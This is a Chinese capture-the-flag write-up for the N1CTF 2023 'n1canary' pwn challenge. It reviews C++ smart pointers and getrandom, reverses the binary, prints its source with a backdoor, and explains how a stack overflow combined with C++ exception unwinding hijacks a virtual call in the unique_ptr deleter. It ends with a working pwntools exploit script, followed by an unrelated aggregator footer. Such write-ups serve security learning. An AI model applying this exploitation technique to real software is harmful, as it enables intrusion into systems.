2023 N1CTF-n1canary

文章目录

  • 参考
  • n1canary
    • 模板类和模板函数
    • make_unique和unique_ptr
      • std::unique_ptr
        • 示例:
      • std::make_unique
        • 示例:
      • 结合使用示例
    • operator->
    • getrandom
    • 逆向
    • 源码
    • 思路
    • exp

参考

https://nese.team/posts/n1ctf2023/

n1canary

模板类和模板函数

template <size_t SIZE> struct ProtectedBuffer {  char buf[SIZE];
};ProtectedBuffer<64> buf

ida中
在这里插入图片描述

  template <typename Fn> void mut(Fn const &fn) {fn(buf);check();}buf.mut([](char *p) { scanf("%[^\n]", p); });

ida中
在这里插入图片描述
Fn是函数类型,如函数参数,函数返回值可用lambda表达式代替,然后mut的参数就是在前一步基础上带有具体的函数方法体了,也是Fn函数类型的,IDA似乎直接把mut的参数优化成了函数方法体的参数了,函数方法体已经生成在具体的函数里了

make_unique和unique_ptr

std::unique_ptr

std::unique_ptr是一个智能指针,它拥有其所指向的对象的独占所有权。这意味着一旦std::unique_ptr超出作用域,它会自动调用析构函数并释放其管理的对象,防止内存泄漏。std::unique_ptr不允许复制,但可以移动,这意味着资源的所有权可以在不同的std::unique_ptr之间转移。

示例:
#include <iostream>
#include <memory>// 定义一个简单的类
class MyClass {
public:MyClass(int value) : value_(value) {std::cout << "MyClass constructed with value: " << value_ << std::endl;}~MyClass() {std::cout << "MyClass destructed." << std::endl;}int getValue() const {return value_;}
private:int value_;
};int main() {// 使用 std::unique_ptr 来管理 MyClass 的对象std::unique_ptr<MyClass> uptr = std::make_unique<MyClass>(42);// 使用智能指针访问对象std::cout << "Value from MyClass: " << uptr->getValue() << std::endl;// std::unique_ptr 在超出作用域时会自动释放其管理的对象return 0;
}

std::make_unique

std::make_unique是C++14中引入的一个工厂函数,用于方便地创建std::unique_ptr对象。它可以自动推导出对象的类型,并调用合适的构造函数来初始化对象,避免了手动使用new操作符的繁琐和潜在错误。

示例:
#include <iostream>
#include <memory>// 使用 std::make_unique 直接创建并初始化 std::unique_ptr
int main() {auto uptr = std::make_unique<int>(42); // 创建一个指向整数的 std::unique_ptr// 使用智能指针访问对象std::cout << "Value from unique_ptr: " << *uptr << std::endl;// std::unique_ptr 在超出作用域时会自动释放其管理的对象return 0;
}

结合使用示例

结合std::make_uniquestd::unique_ptr,我们可以非常简洁和安全地管理动态内存:

#include <iostream>
#include <memory>class MyClass {
public:MyClass(int value) : value_(value) {}~MyClass() { std::cout << "MyClass destructed." << std::endl; }int getValue() const { return value_; }
private:int value_;
};int main() {// 使用 std::make_unique 创建 std::unique_ptr 并初始化 MyClass 对象auto uptr = std::make_unique<MyClass>(42);// 访问 MyClass 对象的值std::cout << "Value from MyClass: " << uptr->getValue() << std::endl;// std::unique_ptr 在 main 函数结束时自动释放其管理的 MyClass 对象return 0;
}

在上面的示例中,std::make_unique用于创建std::unique_ptr,并在MyClass的构造函数中传递一个整数值。std::unique_ptr负责在main函数结束时释放MyClass对象。

operator->

在C++中,operator->是一个成员访问操作符,它被用来重载指针的解引用箭头操作符。当你使用->来访问一个对象的成员时,这个操作实际上是在调用operator->函数。

对于std::unique_ptr而言,operator->成员函数返回一个指向其管理的对象的指针。这使得你可以像使用普通智能指针一样通过->操作符来访问对象的成员。

getrandom

getrandom() 函数是在 Linux 内核版本 3.17 中引入的,旨在提供一种更安全的方式来获取随机数,尤其是当应用程序需要高质量的随机数据时,比如在加密应用中。这个函数比旧的 /dev/urandom/dev/random 设备文件更高效,因为它减少了上下文切换和系统调用的开销。

getrandom() 函数的原型如下:

#include <linux/random.h>
#include <unistd.h>ssize_t getrandom(void *buf, size_t buflen, unsigned int flags);
  • buf: 是一个指向缓冲区的指针,getrandom() 将把随机数据写入这个缓冲区。
  • buflen: 是缓冲区的大小,即期望填充的字节数。
  • flags: 可以包含一些标志位,例如:
    • GRND_RANDOM: 强制从阻塞的熵池中读取数据,这类似于从 /dev/random 获取数据。如果熵池中的数据不足,此函数会阻塞直到有足够的熵为止。
    • GRND_NONBLOCK: 如果熵池中的数据不足,此函数不会阻塞,而是立即返回。如果返回值是负数,你可以通过检查 errno 来确定是否是因为熵池中的数据不足。
    • 默认情况下,getrandom() 行为类似于从 /dev/urandom 获取数据,即它总是返回非阻塞的随机数据,即使熵池中的数据不足。

getrandom() 返回的是写入缓冲区的字节数,如果发生错误则返回一个负值,此时可以通过 errno 变量来确定具体的错误原因。

逆向

在这里插入图片描述
在这里插入图片描述
会通过随机数生成方式填充sys_canary,然后通过输入方式用户输入一个8个字节的到user_canary

在这里插入图片描述

根据虚表追踪到最终调用的虚函数
在这里插入图片描述
在这里插入图片描述
三个变量,没有虚函数,实现四个函数
在这里插入图片描述
在这里插入图片描述

模板参数是一个lambda表达式,该lambda表达式是在BOFApp::launch函数中定义的,并且接受一个char *类型的参数

调用了lambda表达式的operator(),即执行了lambda函数体。a2和a1作为参数传递给这个lambda函数
在这里插入图片描述
往ProtectedBuffer的前64个字节的起始位置输入,但没有长度限制,溢出
在这里插入图片描述
会检查溢出,如果不一样就会抛出异常在这里插入图片描述
然后回溯到man函数,被main函数的catch给处理

在这里插入图片描述
然后catch后会执行
在这里插入图片描述

有后门
在这里插入图片描述

源码

#include "sys/random.h"
#include "utils.h"
#include <cstdio>
#include <cstring>
#include <memory>
constexpr size_t CANARY_RANDBITS = 3;
constexpr size_t CANARY_SHIFTBITS = 4;
constexpr size_t CANARY_POOL_SIZE = 1 << CANARY_RANDBITS;
u64 user_canary[CANARY_POOL_SIZE];
u64 sys_canary[CANARY_POOL_SIZE];
template <size_t SIZE> struct ProtectedBuffer {char buf[SIZE];char padding = 0;u64 canary;ProtectedBuffer() {bzero(buf, sizeof(buf)); //bzero函数将buf数组清零canary = getCanary();}u64 getCanary() {u64 addr = (u64)this;u64 canary_idx = (addr >> CANARY_SHIFTBITS) & (CANARY_POOL_SIZE - 1);//canary_idx 0~15u64 raw_canary = user_canary[canary_idx] ^ sys_canary[canary_idx];return raw_canary;}void check() {if (canary != getCanary()) {raise("*** stack smash detected ***");}}//typename关键字用于声明模板参数Fn是一个类型template <typename Fn> void mut(Fn const &fn) {fn(buf);check();}// mut是一个模板成员函数,它接受一个函数对象Fn,// 通常是一个lambda或函数指针。这个函数对象应该接受一个char *类型的参数,即缓冲区的地址。// mut函数执行传入的函数对象,并在完成后调用check()来验证缓冲区的完整性。
};static void init_canary() {if (sizeof(sys_canary) != getrandom(sys_canary, sizeof(sys_canary), 0)) {raise("canary init error");}puts("To increase entropy, give me your canary");readall(user_canary);
}struct UnsafeApp {UnsafeApp() { puts("creating dangerous app..."); }virtual ~UnsafeApp() {}virtual void launch() = 0;
};struct BOFApp : UnsafeApp {void launch() override {ProtectedBuffer<64> buf;puts("input something to pwn :)");buf.mut([](char *p) { scanf("%[^\n]", p); });//读取一系列字符,直到遇到一个不属于集合[^]的字符为止//从标准输入读取一整行文本(不包括换行符),并将其存储在p指向的缓冲区puts(buf.buf);}
};static void backdoor() { system("/readflag"); }int main() {setbuf(stdin, nullptr);setbuf(stdout, nullptr);init_canary();try {auto app = std::make_unique<BOFApp>();app->launch();} catch (...) { //catch (...) 是一个捕获所有类型的异常的通用捕获块puts("error!!!");exit(1);}
}#pragma once
#include <cstdlib>
#include <stdexcept>
#include <unistd.h>
using u64 = unsigned long long;
static inline void raise(const char *msg) {puts(msg);throw std::runtime_error(msg);
}
static inline void readall(void *ptr, size_t size) {char *p = (char *)ptr;size_t tot = 0;while (tot < size) {auto res = read(STDIN_FILENO, p + tot, size - tot);if (res <= 0)raise("IO error");tot += res;}
}
template <typename T> static inline void readall(T &dest) {readall(&dest, sizeof(dest));
}

思路

溢出能够控制栈上内容,由于溢出控制的是main中调用launch的栈帧内容,如果溢出到原来main函数的栈帧,那么当异常回溯到main时没准可以利用到溢出的内容进而造成漏洞利用

原来溢出,但没有溢出到返回地址时,throw后跳转到的catch就是main函数部分的
在这里插入图片描述
原来的返回地址是0x0000000000403407 ,溢出保持返回地址不变,随意覆盖rbp并不产生段错误
在这里插入图片描述
查看是否有利用到溢出后的main函数的栈帧的函数

mov rax, rsp mov rdi, rax正好会把当前溢出的0x4f4aa0所在的栈地址移动到rax和rdi
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
std::__uniq_ptr_impl<BOFApp,std::default_delete<BOFApp>>::_M_ptr套娃半天就是返回第一个参数,第一个参数就是0x4f4aa0所在的栈地址,然后std::unique_ptr<BOFApp>::get_deleterstd::move<BOFApp *&>也是一样,只能看std::default_delete<BOFApp>::operator()(BOFApp*)
在这里插入图片描述
rbx之前就被赋值为了0x4f4aa0所在栈地址
在这里插入图片描述

这里将0x4f4aa0作为第二个参数0x4f4aa0所在栈地址作为第一个参数,然后检查第二个参数不为空就会call 第二个参数指向的值+8作为地址指向的内容作为函数指针,所以0x4f4aa0所在地址的值为0x4f4aa0然后+8作为地址0x4f4aa0+8的位置的内容为函数指针,最后就会跳转到这个函数这里去,所以0x4f4aa0+8的值为后门的地址即可
真的太妙了真的太妙了感觉我是废物
在这里插入图片描述

在这里插入图片描述

exp

from pwn import *
a = process("./a.out")gdb.attach(a)
pause()
payload = p64(0x4f4aa0) + p64(0x403387)
payload = payload.ljust(64,b"a")
a.sendlineafter(b"To increase entropy, give me your canary\n",payload)payload = b"a"*0x68+p64(0x403407)+p64(0x4f4aa0)
a.sendlineafter(b"input something to pwn :)\n",payload)
a.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/870515.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

TCP协议的三次握手和四次挥手(面试)

三次握手 首先可以简单的回答&#xff1a; 1、第一次握手&#xff1a;客户端给服务器发送一个 SYN 报文。 2、第二次握手&#xff1a;服务器收到 SYN 报文之后&#xff0c;会应答一个 SYNACK 报文。 3、第三次握手&#xff1a;客户端收到 SYNACK 报文之后&#xf…

内存巨头SK海力士正深化与TSMC/NVIDIA合作关系,开发下一代HBM

据BusinessKorea报道&#xff0c;内存巨头SK海力士正深化与台积电(TSMC)及英伟达(NVIDIA)的合作关系&#xff0c;并计划在9月的台湾半导体展(Semicon Taiwan)上宣布更紧密的伙伴关系。 SK海力士与台积电的合作历史已久。2022年&#xff0c;台积电在其北美技术研讨会上宣布成立O…

脉脉高聘:面对薪资福利减少,超40%职场人自动缩短工时

近日&#xff0c;脉脉高聘人才智库发布《2024职场生存洞察》&#xff08;下称《洞察》&#xff09;。 数据显示&#xff0c;2024上半年&#xff0c;新经济行业求职压力居高不下&#xff0c;人才供需比达到1.97&#xff0c;相当于2个人竞争1个岗位。求职压力也让职场人心态趋于…

windows下安装和使用nacos

概述 Nacos致力于帮助您发现、配置和管理微服务。Nacos提供了一组简单易用的特性集&#xff0c;帮助您快速实现动态服务发 现、服务配置、服务元数据及流且管理 Nacos官方文档&#xff1a;https://nacos.io/zh-cn/docs/quick-start.html Nacos下载地址&#xff1a;https://n…

小程序问题

1.获取节点 wx.createSelectorQuery() wx.createSelectorQuery().in(this) //组件中加in(this)&#xff0c;不然获取不到 2.使用实例 wx.createSelectorQuery().in(this).select(#share).fields({node: true,size: true}).exec(async (res) > {const canvas res[0].node;…

通过window.postMessage,跨域传递数据

第一个项目的代码&#xff0c;项目地址 http://localhost:5173/ 第二个项目的代码&#xff0c;项目地址 http://localhost:5174/ 点击按钮会打开第二个项目的页面 第二个项目的页面

Rust代码优化的九大技巧

一.使用 Cargo 内置的性能分析工具 描述&#xff1a;Cargo 是 Rust 的包管理器&#xff0c;带有内置工具来分析代码性能&#xff0c;以识别性能瓶颈。 解释&#xff1a; 发布模式&#xff1a;在发布模式下编译启用优化&#xff0c;可以显著提高性能。 cargo build --release基…

StarRocks下载使用说明和基础操作

简介 StarRocks 是一款高性能分析型数据仓库&#xff0c;使用向量化、MPP 架构、CBO、智能物化视图、可实时更新的列式存储引擎等技术实现多维、实时、高并发的数据分析。StarRocks 既支持从各类实时和离线的数据源高效导入数据&#xff0c;也支持直接分析数据湖上各种格式的数…

C++:组合和继承的区别

组合介绍以及与继承对比 什么是组合 (1)composition&#xff0c;组合&#xff0c;就是在一个class内使用其他多个class的对象作为成员 (2)用class tree做案例讲解 (3)组合也是一种代码复用方法&#xff0c;本质也是结构体包含 #include <iostream> #include <vector…

前端-Cookie篇

文章目录 一、由来什么是Cookie&#xff1f;特点Cookie的类型 二、原理三、Cookie生成机制客户端设置案例 四、属性五、缺陷最后分享一段自己工作中封装的一些关于cookie的公众方法✒️总结 前端Cookie是Web开发中非常重要的一部分&#xff0c;它是服务器发送到用户浏览器并保存…

Python模块ConfigParser读取应用程序的配置文件简单示例

一、模块说明&#xff1a; 系统管理员通常通过文本编辑器编辑这些配置文件&#xff0c;以设置应用程序的默认值&#xff0c;然后应用程序将读取并解析这些配置文件&#xff0c;并根据其中的内容执行对应操作。ConfigParser模块具有read()方法&#xff0c;用于读取配置文件。 …

STM32自己从零开始实操08:STM32主控原理图

由于老师使用的各引脚分门别类的单片机原理图我没有找到&#xff0c;我使用是引脚按顺序摆放的&#xff0c;不方便一个模块一个模块截图展示&#xff0c;所以这部分使用老师的原理图。 一、电源 1.1电源的介绍 1.1.1数字电源和地&#xff08;VDD和VSS&#xff09; 数字电源…

中国各省养老机构数据明细(更新至2024年)

中国养老机构是指为老年人提供集中居住、生活照顾、健康管理、文化娱乐等综合性服务的设施。这些机构包括养老院、福利院、老年公寓等多种形态&#xff0c;既有公立也有民办&#xff0c;遍布城市与农村。 一、数据介绍 数据名称&#xff1a;中国养老机构数据明细 数据范围&am…

[leetcode]minimum-cost-to-reach-destination-in-time 规定时间内到达终点的最小费用

. - 力扣&#xff08;LeetCode&#xff09; class Solution { private:// 极大值static constexpr int INFTY INT_MAX / 2;public:int minCost(int maxTime, vector<vector<int>>& edges, vector<int>& passingFees) {int n passingFees.size();ve…

LinkedList----源码分析

源码介绍 public class LinkedList<E>extends AbstractSequentialList<E>implements List<E>, Deque<E>, Cloneable, java.io.Serializable{} 添加过程中的操作&#xff1a; 当创建LinkedList类时&#xff0c;会调用其空参构造方法&#xff0c;将其参…

ipv4和ipv6的兼容性问题

ipv4和ipv6的兼容 现今大多知名网站都是同时支持ipv6和ipv4&#xff0c;这种可以分为两种情况讨论&#xff1a; 一个IPv4的网络和一个IPv6的网络通信;一个IPv6的网络和一一个IPv6的网络通信&#xff0c;但是中间需要经过一一个IPv4的网络。 先以第一种为例&#xff1a; 若一…

昇思大模型——MindFormers的使用----从零开始安装配置环境

MindSpore Transformers套件的目标是构建一个大模型训练、微调、评估、推理、部署的全流程开发套件&#xff0c;提供业内主流的Transformer类预训练模型和SOTA下游任务应用&#xff0c;涵盖丰富的并行特性。期望帮助用户轻松的实现大模型训练和创新研发。 MindSpore Transform…

Linux编程第三篇:Linux简介,开源软件简介(Linux是否安全?参考TESEC指标)

业精于勤荒于嬉&#xff0c;行成于思毁于随。 今天这篇算是Linux的正式学习&#xff0c;废话不多说&#xff0c;我们开始吧 第三篇 一、UNIX与Linux发展史1.1、UNIX发展历史和发行版本1.2、UNIX主要发行版本1.3、Linux发展历史1.4、Linux内核版本1.5、Linux主要发行版本 二、开…

渐变且描边文字

效果&#xff1a; 用 background-image&#xff1a;linear-gradient实现渐变、 text-shadow实现描边 元素同时添加&#xff1a; background-image: linear-gradient(to bottom, rgba(255, 255, 255, 1), rgba(143, 180, 253, 1));-webkit-background-clip: text;background-…

Spring支持人工智能应用框架-SpringAi

简介 人工智能技术和日益成熟&#xff0c;开发企业级人工智能的应用已成为一个热门的趋势。Spring AI 是一个用于 AI 工程的应用框架&#xff0c;目的是为了简化AI应用的对接、部署、维护和扩展。 SpringAi的灵感来自LangChain和LlamaIndex&#xff0c;但是SpringAi并不是直接…